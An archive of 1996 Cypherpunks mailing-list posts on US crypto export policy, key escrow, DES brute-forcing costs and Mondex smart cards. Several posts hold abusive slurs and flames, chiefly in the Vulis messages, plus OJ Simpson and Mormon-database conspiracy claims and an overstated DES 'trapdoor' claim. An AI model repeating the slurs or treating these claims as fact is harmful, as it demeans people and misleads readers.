>>(Else what's to stop Giant Corporation from using Non-GAKked software
>>within the U.S., which is perfectly legal (under the "voluntary" system),
>>but then "happening" to have their foreign branches and customers obtain
>>"bootleg" versions at their end? All it takes is a single copy to get out,
>>and be duplicated a zillion times. Voila, interoperability, with the only
>>"crime" being the first export...which is essentially impossible to stop,
>>for so many reasons we mention so often. Conclusion: Government must make
>>this very mode illegal, perhaps by making it a conspiracy to thwart the
>>export laws....)
>
>If this solution were really practical, it would have been tried already.

And just what would you call PGP?

Long before the MIT deal, people in the U.S. were using their "OK in
America" (not counting RSADSI's issues) software to communicate with
"illegally exported" copies in foreign lands.

This model--leaking a U.S. version and then communicating freely between
U.S. sites and the "leakee" sites--worked for PGP. I believe the USG fears
this will happen again.

Hence my speculation that they may try to illegalize the mere communication
with an offending product.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 2 Oct 1996 13:56:21 +0800
To: Dale Thorn <cypherpunks@toad.com
Subject: [CRYPTO] re: Cryptography of a sort [FAQ]
In-Reply-To: <3250B112.154@gte.net>
Message-ID: <199610020242.UAA11096@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <3250B112.154@gte.net>, on 09/30/96 
   at 10:50 PM, Dale Thorn <dthorn@gte.net> said:

=1EI've been programming since Feb. 2, 1975, when I bought my first HP-65=
. 
=1E
    that HP65 was about 800 bucks at that time, still got one around here=

    somewhere but the mag reader needs cleaning and adjustment to 
    work --I was going to use the HP65 surveying pack a couple months 
    ago, but just dug around and found one for Sun....

=1E21.66
=1Eyears and 30 or so personal computers later, I have an HP-48GX, a Win9=
5
=1Elaptop, and an HP-200LX with an 85 mb flash card STAC'd 170 mb.

=1EI've done several national articles, the last in Dr. Dobb's, June 1991=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 2 Oct 1996 15:08:06 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <Pine.LNX.3.95.961001105928.27216D-100000@user1.scranton.com>
Message-ID: <3251E8E8.78B2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Moroni wrote:
> The database is just for genealogical stuff and church papers.

Sometimes I wonder if I came from another planet, or is everyone 
experiencing the same thing, i.e., I have two relatives high up in 
Scientology (recruiting, placement, fundraising), several in LDS, even a 
Pagan or two, and I'm not even from California.

If the Mormon database is so innocuous, why are they so *desperate* to 
build it?  Genealogical?  If you ever rode on a train, a plane, or took 
a cruise, you're in it.  They have everything.  Or, in the vein of 
Hoover or Wackenhut, "you can never have enough".

> On Mon, 30 Sep 1996, Dale Thorn wrote:
> > On the below: Gentiles (and Jews) are *very* afraid of Mormons.  Maybe
> > it has something to do with the World's Largest Database (on non-Mormons
> > especially) they keep under that mountain near SLC Utah.

[additional text deleted]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 2 Oct 1996 15:00:53 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Clipper III on the table
Message-ID: <199610020406.VAA19458@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:31 PM 10/1/96 -0700, Lucky Green wrote:
>
>
>
>On Tue, 1 Oct 1996, Robert Hettinga wrote:
>[as to why HP and others support GAK in exchange for DES export]
>
>> I agree with Lucky's earlier hypothesis that HP's doing this to curry 
>favor
>> for government contracts in lieu of an actual marketing strategy, and I
>> leave TIS's motives up to the list as an exercise. ;-).
>
>This not a hypothesis. A policy person from HP told me that
>
>1. HP as well as TIS and other companies sell single DES products that 
>they would like to be able to export.
>2. He was directed by HP's marketing department to find a way to make 
>that happen.
>3. He therefore supports a GAK for export "compromise".


HP, then, might be a good company to approach as a potential donor on a 
DES-cracker.   While they want to be able to portray their products as 
reasonably secure, at the same time they want to be able to de-fuse any 
export limits.  Showing that, say, $25,000 of hardware could crack DES in a 
year (and thus, presumably, $25 million could crack DES in 1/3 of a day, a 
budget available to the NSA et al.) would demonstrate that there's no strong 
reason to keep it restricted in any way.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 2 Oct 1996 15:01:11 +0800
To: cypherpunks@toad.com
Subject: Re: Can we kill single DES?
Message-ID: <199610020411.VAA29067@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:

> Since it looks like the US government will be allowing the export of 
> 56 bit espionage-enabled software, it's time to kill single DES.

Yes.  It's an obsolete cipher with a woefully small key.  Only
a catastrophic failure will cause the ABA to undergo religious
enlightenment.

> As some of you will recall, a while back I wondered aloud about the
> feasibility of brute-forcing DES on general purpose machines, ala the
> RC4-40 crack last year. 

I'm a firm believer in "work smart, not hard."  It might be interesting
to run a wiring diagram of DES through a superoptimizer and see how many
algebraic identities fall out.

An analytical crack that could be published on the Net would be far
more impressive than harnassing gigacycles on every available machine,
which might very well awe the gullible into thinking DES was difficult
to break.

> On this type of processor, it would still take 9133 years to exhaust 
> a 56 bit key space. On the other hand, on 20,000 processors of this
> power it would take less than 6 months. If the target is encrypted
> in a chaining mode with an unknown 8 byte IV, the time more than 
> doubles. 

I can see the headlines now.  "Cypherpunks show DES can withstand up 
to 9,000 Pentium-years of torture and keep on ticking."

Remember the Law of Unintended Consequences.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 2 Oct 1996 17:35:51 +0800
To: cypherpunks@toad.com
Subject: ITAR satellite provision
Message-ID: <v02130500ae773ea461fb@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone on the list have the exact ITAR reg. text relating to the
exemption for space-launched crypto?

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 2 Oct 1996 19:26:46 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: active practice in America [RANT]
In-Reply-To: <Pine.LNX.3.95.961001161524.615C-100000@gak.voicenet.com>
Message-ID: <3251F258.643@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> On Mon, 30 Sep 1996, Dale Thorn wrote:
> > Re: Below text.  One of the most fascinating aspects of the Simpson
> > case (to me, anyway) is how persons who know about conspiracies,
> > mafia hits, etc., are still willing to believe OJ is guilty (fer
> > sure), looking only at the "evidence" presented by the same folks
> > who (send for list).

> Information about the evidence, crime and trial are not classified for
> the reason of "national security" in this case.

True, but what's reported is a joke, just like other media scams.

> There's a motive and there is nothing outlandishly unbelievable about
> the possibility that Simpson did do it.

I didn't say no possibility, just very little probability.  And what 
motive did this wealthy man have to savagely (inhumanly, yet) murder 
those two people?  There are people who have plausible motives, though.

> OJ never was in the military and there is nothing that even remotely
> suggests that he had anything to do with the CIA.

CIA, remotely?  I guess Colby, Jr. living next to Nicole is outside the 
boundary of remote?  I guess A.C.'s boss Ippolito, *close* friend of 
George Aronow, *close* friend of George Bush, etc. is also out of 
bounds?  Ever hear of international coke rings?  OJ was up to his neck 
in Mob, and looks like Denise Brown likewise.  Too remote for you?

> The Simpson case and the JFK assassination are not even remotely
> comparable.

Lessee, an apple and a banana are "not even remotely comparable", due to 
so many differences, etc.  But, I can eat both of them, and get 
nutrition from both, so, they *do* have quite a bit in common.
The Warren Commission, and all "official" treatments of the JFK 
assassination were not based on the real evidence, nor was the OJ trial. 
If you're one of those people who saw Ruby do it, and you said "gee, 
musta been just another wacko", then you could look at the OJ trial the 
same way and say "gee, just another crazy black man", etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 16:46:15 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Weaknesses in Smart Cards? (Re: FLA_wed)
In-Reply-To: <ae778e7901021004910d@[192.0.2.1]>
Message-ID: <Pine.3.89.9610012138.A15603-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


> As best I can figure, extracting the secret from a Mondex card gives you not
> merely the money from the card, but the "digital plates" with which to mint
> arbitrarily much more money. I only say this because the only protocol the
> I can think of that fits what we do know of Mondex has this problem. This fault
> does not plague Chaum cash.

There is no way to know for sure, since Mondex won't release the specs, 
but just about everybody I talk with that knows at least something about 
their system agrees that if you crack a Mondex card, you will likely be 
able to mint money. Since Mondex allows transfers from card to card to 
card, it may be a long time indeed before the breech is disovered. If I 
were a Mondex issuer, I would be worried. Very worried.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 2 Oct 1996 13:46:12 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <v03007801ae7760b5f2f3@[206.119.69.46]>
Message-ID: <v03007807ae777df1e35c@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:31 pm -0400 10/1/96, Lucky Green wrote:
> This not a hypothesis. A policy person from HP told me that...

I stand corrected. It is a fact. Serves me right for working from memory on
that point.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 16:00:34 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <199610020332.UAA16659@mail.pacifier.com>
Message-ID: <Pine.3.89.9610012223.A15603-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, jim bell wrote:
> An import restriction would be even less effective than the current export 
> restrictions.  With an import restriction, a person need merely receive a 
> given piece of software in the mail from an "unknown" benefactor, software 
> that (surprise!) would have been illegal to import.  (the software doesn't 
> even have to be mailed from outside the US, merely trucked in by a wetback 
> and anonymously mailed by tossing it into the ubiquitous USnail PO Box.)   
> Redistribution of this software would have to be legal, if for no other 
> reason than nobody could prove it was imported illegally.  Nobody outside 
> the US would have any standing to sue for copyright violation, because they 
> couldn't import it and sell it without restrictions.

You are missing something. Import restrictions only make sense if 
possession of the software will be illegal. And as any long time reader of 
this list should realize, this is what the government's crypto 
initiatives are in the long run all about. Clipper IV is just the nose of 
the camel.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 15:12:04 +0800
To: cypherpunks@toad.com
Subject: Re: This list is a joke
In-Reply-To: <Pine.WNT.3.95.961001155921.242D-100000@test1>
Message-ID: <6yF6uD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Temple <dtemple@ashland.edu> writes:

> When I subscribed to this list, I thought it would have decent
> communication on worthwhile topics.  I've come to realize though that 75%
> of the messages I receive are from people whining like 4 year olds.  I am
> making a huge assumption in saying that most of the people on this list
> are adults.  It is time to start acting like it.

When I joined this mailing list, it had plenty of technical discussions
posted by people knowledgeable in cryptography. They have all since left.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 2 Oct 1996 16:09:17 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Weaknesses in Smart Cards? (Re: FLA_wed)
Message-ID: <ae77aa9900021004b4a1@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 PM 10/1/96, Lucky Green wrote:

>There is no way to know for sure, since Mondex won't release the specs,
>but just about everybody I talk with that knows at least something about
>their system agrees that if you crack a Mondex card, you will likely be
>able to mint money. Since Mondex allows transfers from card to card to
>card, it may be a long time indeed before the breech is disovered. If I
>were a Mondex issuer, I would be worried. Very worried.
>
>--Lucky

I can imagine a protocol that would allow the Mondex card to issue several
brands of card that would normally appear to be one uniform brand until
fraud was suspected or proven. Then only money passed thru the compromised
brand would be suspect. News of the counterfeit brand would be spread among
cards by a contagion algorithm. One morning your card would greet
you saying that $38 of your cash is counterfeit, or worse, that your card
could issue no money to other cards, but could be returned to the issuer
for a partial refund.  I would not want to hide my Mondex card under the matress
for my old age.

I recall hearing something about Mondex that suggested to me that the
card rembered recent large receits and that money had fingerprints
so as to remember, to a degree, where it had been recently. When questioned
about the privacy issues they responded that of course only the authorities
would be able to retrieve such information.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 2 Oct 1996 16:16:41 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <199610020332.UAA16659@mail.pacifier.com>
Message-ID: <v03007802ae77bdc0e257@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:32 PM -0800 10/1/96, jim bell wrote:

>An import restriction would be even less effective than the current export
>restrictions.  With an import restriction, a person need merely receive a
>given piece of software in the mail from an "unknown" benefactor, software
>that (surprise!) would have been illegal to import.  (the software doesn't
>even have to be mailed from outside the US, merely trucked in by a wetback
>and anonymously mailed by tossing it into the ubiquitous USnail PO Box.)
>Redistribution of this software would have to be legal, if for no other
>reason than nobody could prove it was imported illegally.  Nobody outside
>the US would have any standing to sue for copyright violation, because they
>couldn't import it and sell it without restrictions.

They can of course outlaw possession and distribution of code not legal to
import into the U.S., regardless of whether they can find out who imported
it.

Imagine your reasoning modified to cover a very relevant current law:

Origninal:

"Redistribution of this software would have to be legal, if for no other
reason than nobody could prove it was imported illegally."

Modified Version:

"Redistribution of narcotics and other drugs would have to be legal, if for
no other reason than nobody could prove they were imported illegally."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 2 Oct 1996 18:35:05 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.GSO.3.95.961001145707.23810F-100000@well.com>
Message-ID: <v03007803ae77bf3e3c4b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:50 PM -0700 10/1/96, John Anonymous MacDonald wrote:

>I don't doubt that they can do this if they really want to, but I
>wonder what legal basis they will use for import restrictions.
>
>Are there any current import restrictions for products on can legally
>manufacture, sell, and use in the United States?

Automobiles, computers, chips, steel, tobacco, televisions....

All have had, or still have, various "import restrictions." Sometimes
quotas, sometimes heavy duties, sometimes complete bans. Sometimes the
rationale was that foreign nations were "dumping," but often the real
rationale was protectionism.

(This may not have been the type of example the questioner was asking
about, but it fits the definition of "import restrictions." In fact, the
whole raison d'etre of "U.S. Customs" is to control imports as well as
exports, and certainly not just "illegal imports.")

There are also various animals which may not be imported, various
agricultural products which may not, etc., even if the animals and
agricultural products may be found in the U.S. (Examples: various reptiles,
tropical birds, endangered species, etc.)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 16:20:03 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <199610020350.UAA08078@abraham.cs.berkeley.edu>
Message-ID: <Pine.3.89.9610012248.A15603-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, John Anonymous MacDonald wrote:

> > From: Declan McCullagh <declan@well.com>
> > 
> > "What?" I asked. "Unless you're talking about import restrictions."
> > 
> > "Exactly," he said.
> > 
> > -Declan
> 
> I don't doubt that they can do this if they really want to, but I
> wonder what legal basis they will use for import restrictions.

Public safety.

> Are there any current import restrictions for products on can legally
> manufacture, sell, and use in the United States?

Sure. Firearms. The Gun Control Act of 1968 bans the importation of 
supposedly "cheap" firearms that can to this day (though this is about 
to change) legally be manufacturered and sold in the US. For the political 
novices, here is a brief explanation of the often overlooked 
cryptography/"munitions" connection.

A high level of firearms ownership in the population, similarly to a high 
penetration of crypto software, puts an upper boundary on what a 
government can do to its citizens. The first order of any government 
wishing to go beyond this border must therefore be to dramatically reduce 
the level of gun ownership (and crypto, but that is relatively new 
invention.)

Consequently, one of the first laws the Fuhrer had passed was the Firearms 
Control Act of 1933. The USG, also intend on exceeding said boundary (to 
what degree remains to be seen) followed his lead in passing the Gun 
Control Act of 1968, copying much of the 1933 law, often verbatim. This 
should come as no surprise, given the fact that the author of the 1968 
Act was working of a translation of the 1933 law that he requested from 
the Library of Congress.

Once the concept of gun control had been established, it could be 
expanded on in the future and has been so to this day.

What does all that have to do with crypto? It is the *same* issue. In the 
government's view, crypto is a danger to their future plans, just as 
firearms are. Do you think it is a coincidence that crypto is listed as a 
munition? Think about it for just a moment. Crypto is a weapon in the 
hands of the people. And that's what Cypherpunks is all about.

Starting from import restrictions, you will see restrictions on size of 
keys (=maximum rounds in the magazine, now set at 10, proposed to be 
lowered to six), who may own it (no felons, people convicted of certain 
misdemeanors), who may sell it and how it can be purchased (must provide 
identification, sales will be logged). I guess you can figure out the rest.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I~nigo Gonzalez" <nexus@adv.es>
Date: Wed, 2 Oct 1996 09:32:42 +0800
To: Kim Yoonjeong <yjkim@ssrnet.snu.ac.kr>
Subject: Re: the key of DES
In-Reply-To: <199609301017.UAA04791@ssrnet.snu.ac.kr>
Message-ID: <32518EA9.3616@adv.es>
MIME-Version: 1.0
Content-Type: text/plain


Kim Yoonjeong wrote:
> 
> Hello, all !
> With given a unknown DES system with 64 bits plaintext p, ciphertext c,
> can there be MORE THAN ONE keys ?

I don't think so:

I you look closely to 1-Round DES, you can have this case:

Let p=LR (plaintext) and K=key (without parity check)

When computing f(R,k) in 1-Round DES I can have the same
input (and output) in the S-Boxes with: 
       
     p=LR, with k ; and p=L(R'), with k'

         (k' denotes 1-complement of k)


You have _two_ different (plaintext,key) pairs with
the same input using f(R,k) and f(R',k').

>From this, you can prove that:

   if  y=DES(p,k) then y'=DES(p',k')

wich is what everyone really wants: a beautiful chance of using
a trapdoor in DES.

Did you like it? - Don't use DES: It's not reliable.
--
  Iñigo González - ADV Internet Technical Advisor <nexus@adv.es>
  "Never say anything online that you wouldn't want to see on the
  front page of The New York Times." - alt.2600.moderated Posting





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 2 Oct 1996 17:09:05 +0800
To: perry@piermont.com
Subject: Re: Clipper III on the table
Message-ID: <199610020637.XAA19893@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 10/1/96 -0400, Perry wrote:
>We really have to work on cracking DES at least once -- it would
>substantially reduce the wind in the Administration's sails.

56 bits + GAK does generally mean DES/GAK, though RC4/56/GAK is also possible.

One "56-bit" protocol that might be allowable under the new rules is
"something strong with all but 56 key bits revealed", e.g. RC4/128
with 72 bits salt revealed (like the RC4/128 with 88 bits salt revealed that
Netscape uses, or 3-DES with 112 bits salt revealed), which would be 
substantially stronger against cracking than raw 56-bit DES.  
A big advantage is that it makes pre-computation of lists less useful,
since two cyphertexts with the same 56-bit key might be different in the
top N-56 bits of key, and the key schedules are less reusable.
The 3DES version, for instance, also gains because some of the big
DES hooks that let you scrounge a few bits don't work.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
America's Open Presidential Debate - Beyond Dole and Clinton!
<A href="http://gate.net/~bdcollar/bbe/media.htm">Tuesday, Oct. 8th 8:00 PM
EDT</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 2 Oct 1996 19:49:19 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <199610020643.XAA29576@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:50 PM 10/1/96 -0700, John Anonymous MacDonald wrote:
>> Date: Tue, 1 Oct 1996 14:56:21 -0700 (PDT)
>> From: Declan McCullagh <declan@well.com>
>> 
>> "What?" I asked. "Unless you're talking about import restrictions."
>> 
>> "Exactly," he said.
>> 
>> -Declan
>
>I don't doubt that they can do this if they really want to, but I
>wonder what legal basis they will use for import restrictions.
>
>Are there any current import restrictions for products on can legally
>manufacture, sell, and use in the United States?


"Sugar"
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 15:58:57 +0800
To: cypherpunks@toad.com
Subject: [SPAM] Timmy May's tentacle thinks I'm Timmy May's tentacle?
In-Reply-To: <844193561.12763.0@fatmans.demon.co.uk>
Message-ID: <B1k6uD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May lies, rants, posts off-topic, and pollutes the cypherpunks
mailing list with his kinky sexual phantasies. Why is this cocksucking
limey faggot dying from the combination of AIDS and the mad cow disease
accusing me of being Timmy's tentacle? How could Timmy create a tentacle
that knows something about crypto when Timmy doesn't?

>Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>From: paul@fatmans.demon.co.uk
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>Date: Mon, 30 Sep 1996 17:40:49 +0000
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7BIT
>Subject: Re: [AP] Afghanistan
>Priority: normal
>X-Mailer: Pegasus Mail for Windows (v2.31)
>Message-Id: <844193561.12763.0@fatmans.demon.co.uk>
>
>
>> >     And this would accomplish???? And this has what to do with cryptography??
>>
>> Nothing, of course - neither do Timmy May's stupid rants, lies, and personal
>> attacks.
>>
>> By the way, your abuse of your native language suggests that you're probably
>> a product of U.S. public education.
>
>Then it would appear that you are ranting here, your post is off
>topic, you are lying, and in addition you have posted a personal
>attack.. Haha! - I`ve found Tim`s secret pseudonym!!!!
>
>
>
>  Datacomms Technologies web authoring and data security
>       Paul Bradley, Paul@fatmans.demon.co.uk
>  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>       Http://www.cryptography.home.ml.org/
>      Email for PGP public key, ID: 5BBFAEB1
>     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 16:53:17 +0800
To: cypherpunks@toad.com
Subject: [SPAM] Timmy May has no life
In-Reply-To: <844193577.12916.0@fatmans.demon.co.uk>
Message-ID: <N1k6uD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I suppose one of the reasons why Americans are so stupid is that so many
of them are of English origin. How does one donate to the IRA anyway?

>Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>From: paul@fatmans.demon.co.uk
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>Date: Mon, 30 Sep 1996 17:40:49 +0000
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7BIT
>Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>Priority: normal
>X-Mailer: Pegasus Mail for Windows (v2.31)
>Message-Id: <844193577.12916.0@fatmans.demon.co.uk>
>
>
>>                    berserk
>> Timmy May has gone        . Has he been eating speed?
>>                    bananas
>
>What? speak English motherfucker.
>
>> >> What has Timmy been smoking?
>
>I assume you are referring to me here, my name is Paul Bradley and
>you can go fuck a kokonut dude.
>
>> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> ]	for dlv
>> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> ]          29 Sep 96 15:59 BST
>> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> ]From: paul@fatmans.demon.co.uk
>
>As you can see my sending is authenticated and the reply path is to
>my host (fatmans.demon.co.uk) the message has passed through
>post.demon.co.uk/disperse.demon.co.uk and on to psi.net, Tim May is
>at got.net.
>
>> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> ]don`t sign keys here and there without checking ID`s...
>
>>Fuckhead.
>
>Fraid not dude, this thread is getting distinctly boring, cut the
>shit, if you have something to say say it, don`t keep spewing shit
>without warning, but really it`s only to be expected from you.
>
>
>
>  Datacomms Technologies web authoring and data security
>       Paul Bradley, Paul@fatmans.demon.co.uk
>  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>       Http://www.cryptography.home.ml.org/
>      Email for PGP public key, ID: 5BBFAEB1
>     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 2 Oct 1996 15:10:36 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <3251E8E8.78B2@gte.net>
Message-ID: <Pine.LNX.3.95.961002003004.31542D-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    I am sure that we all want the list returned to itself sooooo....
cannot me by email so as not to take up bandwidth from the other members
please.
   The mountain is allready housing the genealogical duplicates of
microfilm. I has actually been around a while. Their is no building it. 
   Second , It only house genealogical stuff. Whoever is telling you
otherwise  is misinformed.I don't know how the tall tale of the mountain
holding peoples credit record started . Why would anyone be interested in
someone elses credit records unless it was a business or a credit card
ring.

On Tue, 1 Oct 1996, Dale Thorn wrote:

> Moroni wrote:
> > The database is just for genealogical stuff and church papers.
> 
> Sometimes I wonder if I came from another planet, or is everyone 
> experiencing the same thing, i.e., I have two relatives high up in 
> Scientology (recruiting, placement, fundraising), several in LDS, even a 
> Pagan or two, and I'm not even from California.
> 
> If the Mormon database is so innocuous, why are they so *desperate* to 
> build it?  Genealogical?  If you ever rode on a train, a plane, or took 
> a cruise, you're in it.  They have everything.  Or, in the vein of 
> Hoover or Wackenhut, "you can never have enough".
> 
> > On Mon, 30 Sep 1996, Dale Thorn wrote:
> > > On the below: Gentiles (and Jews) are *very* afraid of Mormons.  Maybe
> > > it has something to do with the World's Largest Database (on non-Mormons
> > > especially) they keep under that mountain near SLC Utah.
> 
> [additional text deleted]
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 2 Oct 1996 18:03:27 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Civil rights and double jeopardy
Message-ID: <3.0b28.32.19961002003256.00689414@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 PM 10/1/96 -0700, Dale Thorn wrote:

>Once they could no longer look the other way, those higher-level 
>authorities should have proceeded against the local governments as I 
>specified, rather than undermining the Constitutional enumerations.

The protection against double jeopardy is constitutionally based and
cannot be modified by statute, e.g., the Civil Rights Act of 1964.
The various civil rights acts, movements, and statutes did not make
Congress nor the executive adopt a loophole around the double jeopardy
protections; the loophole existed considerably prior to then. The double
jeopardy clause is interpreted (and has been since at least 1922) so that
it only bars multiple prosecutions (or punishments) by the same sovereign.
In _US v. Lanza_ 260 U.S. 377 (1922), the Supreme Court wrote: ". . an act
denounced by both national and state sovereignties is an offense against
